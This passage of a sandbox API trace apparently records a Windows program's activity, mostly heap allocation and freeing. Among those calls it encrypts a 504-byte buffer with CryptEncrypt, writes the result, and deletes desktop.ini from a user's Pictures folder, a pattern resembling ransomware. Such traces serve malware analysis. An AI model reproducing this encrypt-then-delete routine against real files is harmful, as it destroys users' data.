dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.664] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.664] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75560 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0209.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0209.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.670] CryptEncrypt (in: hKey=0x9e1cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0209.670] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0209.670] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.670] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.670] CryptEncrypt (in: hKey=0x9e1cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a75560*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x2a75560*, pdwDataLen=0x8cef60*=0x200) returned 1 [0209.671] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.671] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.671] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.671] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.671] WriteFile (in: hFile=0x520, lpBuffer=0x2a75160*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a75160*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0209.672] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.672] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.672] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.672] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab080, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.672] CryptDestroyKey (hKey=0x9e1cf8) returned 1 [0209.672] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.672] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.672] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.672] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.672] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.673] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.673] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.673] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.673] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.673] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.673] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.674] CryptReleaseContext (hProv=0xa7bcd0, dwFlags=0x0) returned 1 [0209.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.674] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.674] CloseHandle (hObject=0x4dc) returned 1 [0209.676] CloseHandle (hObject=0x520) returned 1 [0209.678] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.678] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.678] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x24 [0209.678] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 0x26 [0209.678] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1bf8 [0209.679] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 1 [0209.681] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0209.681] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.681] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.681] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.682] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.683] RtlAllocateHeap 